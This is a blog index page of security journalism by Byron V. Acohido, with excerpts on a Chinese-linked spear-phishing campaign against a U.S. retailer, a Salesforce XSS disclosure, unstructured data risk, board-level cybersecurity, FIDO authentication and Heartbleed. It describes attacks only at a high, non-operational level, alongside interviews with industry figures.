Home Podcasts Videos Guest Posts Q&A My Take Bio Contact



Q&A: Chinese military hacking tactics used against major U.S. retailer

By Byron V. Acohido

This actual snapshot of a cutting edge cyber attack was discovered by analysts at Norse Corp, a security vendor that  has developed an amazing global network of honeypots emulating all sorts of common workplace and home appliances connected to the Internet, with embedded operating systems rife with vulnerabilities. Norse uses this honeypot network to monitor as cybercriminals  scan for, infect, take control of and finally and deploy vulnerable IoT  appliances. Company founder and CTO Tommy Stiansen shared these stunning details with LastWatchdog.

Core finding: Nation state-backed cyber warfare campaigns typically focus on infrastructure such as utilities, defense contractors, financial firms and technology companies. However, forensic experts at Norse Corp. recently documented how a hacking group used military-style breach and data-exfiltration techniques against a large U.S. retailer. The hackers, widely believed to be backed by the Chinese government, ignored the usual pot of gold: payment card transaction data. Instead, they went after intellectual property to support an elaborate counterfeiting campaign.

Attack vector: To get a foothold in the retailer’s network, the hackers spear phish working developers, engineers and designers. The targets get enticed into downloading what they believe to be 3D software to use in their daily work. They actually get the software, but the download also sneaks malware into the company’s network.

Distinctive technique: The infected computers then began to communicate with a command-and-control (C2) server using browser-based URL requests. Data sent back up to the C2 server gets encrypted. Norse analysts have to unravel multiple layers of obfuscation to reveal what’s being exfiltrated, including translating part of the hackers’ encryption string from Japanese to English, and another part from Korean to English.

Wider implications: Retailers, or any other organization with trademarked and/or patented goods and services, should realize financial data isn’t the only data sophisticated hacking groups are proactively seeking. Governments engaging in cyber warfare must now worry that loosing military hacking techniques to breach nonmilitary targets, for whatever … more

VIDEO: Elastica discovers major vulnerability in Salesforce cloud CRM app

By Byron V. Acohido

Cloud application security start-up Elastica should be commended for alerting Salesforce privately about a notable flaw Elastica researchers discovered in one of the subdomains of the official Salesforce website.

Elastica gave Salesforce the heads-up last month, and waited until the CRM giant readied a patch before going public with its finding Wednesday.

Elastica researchers unearthed a cross-site scripting (XSS) vulnerability in admin.salesforce.com, a subdomain used by Salesforce administrators.

Had criminal hackers beat Elastica to the punch, they could have moved to exploit a huge vector of attack. Thousands of companies, many of them small and mid-size organizations that subscribe to Salesforce, would have been exposed.

Security & Privacy Weekly News Roundup: Stay informed of key patterns and trends

An attacker would have been able to execute phishing attacks from inside Salesforce and harvest users’ credentials, with a good chance of eluding spam filters and anti-phishing solutions.

But there is a larger lesson here. Business software can be riddled with flaws like this one, waiting to be discovered. Depending on who finds these so-called zero-day vulnerabilities first, either patching or exploitation can be expected to eventually follow. ThirdCertainty asked Aditya K. Sood, lead architect of Elastica Cloud Threat Labs, to outline the wider context.

3C: Can you characterize how pervasive these types of latent, but as yet undiscovered, vulnerabilities are in business software?

Sood: Any public-facing application is susceptible to an attack. It is difficult to say how many business applications are, but developers can make mistakes, which could result in vulnerabilities. For that reason, we require security assessments of business applications before they are deployed in production environments.

3C: How effective are bounty programs in keeping these types of vulnerabilities mitigated?

Sood: Bug bounties motivate researchers to disclose vulnerabilities to the vendors in a responsible fashion and, in return, researchers get rewarded for their efforts. It definitely helps to build positive relationships with security researchers. It is a very cost-effective … more

VIDEO: Why it’s high time ‘unstructured data’ gets acknowledged, protected

By Byron V. Acohido

Companies are generating mountains of unstructured data and, in doing so, unwittingly adding to their security exposure.

Unstructured data is any piece of information that doesn’t get stored in a database or some other formal data management system.

Some 80 percent of business data is said to be unstructured and that percentage quite obviously has to be rising. Think of it as employee-generated business information—the sum total of human ingenuity that we display in the workplace, typing away on productivity and collaboration software, and dispersing our pearls of wisdom in digital communications.

Unstructured data is all of the data that we are generating on our laptops and mobile devices, storing in cloud services, transferring in email and text messages, and pitching into social media sites.

Many companies are just starting to come to grips with the complex challenge of figuring out how to categorize and manage this deluge of unstructured data.

Sensitive data at risk

But what’s more concerning is the gaping security exposure.

It was unstructured data—in the form of a text message transcript of employees conversing about deflating footballs—that blindsided the New England Patriots NFL team and its star quarterback, Tom Brady.

Yet the full scope of risk created by unstructured data is much more profound.

“The risk that unstructured data poses dwarfs that of any other type of data,” says Adam Laub, product management vice president at STEALTHbits Technologies.  “It is the least understood form of data in terms of access, activity, ownership and content.”

I met with Laub as he was pitching STEALTHbits’ technology at the recent RSA Conference in San Francisco. “Any single file can contain the data that puts an organization in the headlines, and turning a blind eye to the problem or claiming it’s too big to handle is not a valid excuse for why unstructured data hasn’t been secured properly,” Laub says.

STEALTHbits helps companies that use Windows Active Directory … more

FIRESIDE CHAT: Why board directors, senior execs must gain full understanding of data breaches

By Byron V. Acohido

Driven by the fallout of major data breaches at Target, Sony Pictures, Anthem and hundreds of other large and small organizations elsewhere, cybersecurity is now a problem of strategic importance in organizations of all sizes.

ThirdCertainty sat down last week at the RSA Conference in San Francisco with Howard Schmidt, former White House Cybersecurity Advisor under Presidents Bush and Obama, to discuss the wider context. The fireside chat was sponsored by TaaSera, supplier of pre-emptive breach detection systems.

3C: Are the dots starting to connect in the minds of senior executives that their organizations are facing profound new exposures?

Schmidt: Yes, they are starting to look at cybersecurity as a strategic issue that needs to be dealt with at the corporate level. The financial services sector years ago said, “OK, we can lose this amount of money through credit card fraud, and we can work within that.” Now the exposures are much more than that. It’s reputation, it’s government regulation, it’s customer confidence, and so a lot of attention is going into it.

Security & Privacy News Roundup: Stay informed of key patterns and trends

3C: Security vendors certainly are paying attention. There’s no shortage of clever technology to defend networks.

Schmidt: Yes, clearly. Every year at RSA and at Infosec Europe, I see products developed to react to what happened this past year or last week or last month, so you wind up in a situation where you are chasing the problem instead of developing systems to deal with those problems before they occur. For example, we have tremendous capabilities: intrusion detection, intrusion prevention, malware protection, breach detection, all those sort of things. They’ve been good, but they have not been as effective as we need them to be.

3C: Because they’re perimeter focused?

Schmidt: That’s correct, they’re all perimeter-based, so when somebody gets in and it looks like they should be inside, they can start doing … more

Q&A: Is ‘FIDO’ on Samsung Galaxy superior to Apple Pay on iPhone?

By Byron V. Acohido

A day after Apple successfully hyped the ability for iPhone 6 users to biometrically authenticate the purchase of a Big Mac, using Apple Pay and Touch ID, Google rolled out Google Security Key, a new type of USB key based on the FIDO standard. Security Key can make your Gmail account nearly impossible to hack.

The two announcements are related. Both point the way to mainstream use of biometric sensors and other mechanisms for affirming you are who you say you are in digital communications and transactions.

LastWatchdog asked Brett McDowell, Executive Director of the FIDO Alliance to handicap the competition to dominate the next generation of authentication technologies.

LW: In plain language, what is FIDO?

McDowell: FIDO stands for Fast IDentity Online. It’s a new set of industry standards, much like WiFi, Bluetooth and NFC. Any device manufacturer, software developer or online service provider can build support for FIDO standards into their existing products and services to make online authentication simpler and more secure.

The fact that this is all being standardized means the FIDO ecosystem can grow and scale. Any new implementation of the standards that pops up on the Internet will be able to immediately interoperate with any other implementation.

FIDO standards allow online service providers the option to set their own policies about what kind of authenticators they are willing to trust. That includes PIN codes, voice or face recognition software, fingerprint reader, Iris scanners, etc.

LW: What is the key distinction between how Apple is moving to popularize biometrically authenticated consumer purchases vs. the course the FIDO alliance is on?

McDowell: Apple Pay is a payment application, and just like every other application, it requires authentication. The Touch ID sensor, which is used as the authenticator for other applications, including but not limited to Apple Pay, is quite relevant to a discussion about FIDO standards.

To level set, the FIDO Alliance is an … more

VIDEO: Why $3.6 million to prevent next Heartbleed isn’t enough

By Byron V. Acohido

A dozen tech behemoths — led by Microsoft, IBM, Google, Intel and Cisco — have stepped forward with cold, hard cash to prevent the next Heartbleed.

Each has pledged $100,000 annually for the next three years to a war chest earmarked to fund improvements of open source technology.

That’s a collective pledge of $3.6 million, through 2016, set aside in something called the Core Infrastructure Initiative, administered by The Linux Foundation.

VIDEO: Heartbleed threatens financial channels

By Scott Borg

There seems to be some confusion about what Heartbleed is good for. Heartbleed is primarily useful for retrieving information from webservers that reveals the details of those servers’ recent interactions with clients.

This allows attackers to steal the “handshake” information that is used to authenticate an interaction between a client computer and a webserver. In particular, Heartbleed allows attackers to steal the private keys and other long-term authentication codes that are used to set up  private, encrypted communication sessions.

Heartbleed can also allow the attacker to steal enough of the content of the server’s recent communications to capture account numbers and passwords. Together, these pieces of information can allow the attacker to impersonate a client computer without any need to invade that computer.

Criminals using Heartbleed would be able to arrange improper transfers of funds on a fairly large scale, unless the various kinds of authentication codes were changed in time. While Heartbleed can also be used to invade many types of client computers, such as Android phones, potential attackers don’t need Heartbleed to do that. Most Android phones, for example, can already be compromised, using any of several tools currently available from cyber-crime websites.

Sophisticated attackers taking advantage of Heartbleed will be after bigger, more lucrative game than cell phones and credit card numbers. A large portion of the web’s financial channels were potentially in jeopardy.

Fortunately, there were probably not many cyber attackers aware of the Heartbleed vulnerability before the patches for it started to be distributed. Perhaps even more important, there were not enough criminal attackers who understood enough about how financial transactions are carried out to take full advantage of the possibilities Heartbleed opened up.

This means that the biggest opportunities that Heartbleed created for stealing money were mostly closed up before they were much exploited. If there were some large diversions of funds accomplished by using Heartbleed, these will probably never be publicly acknowledged, because … more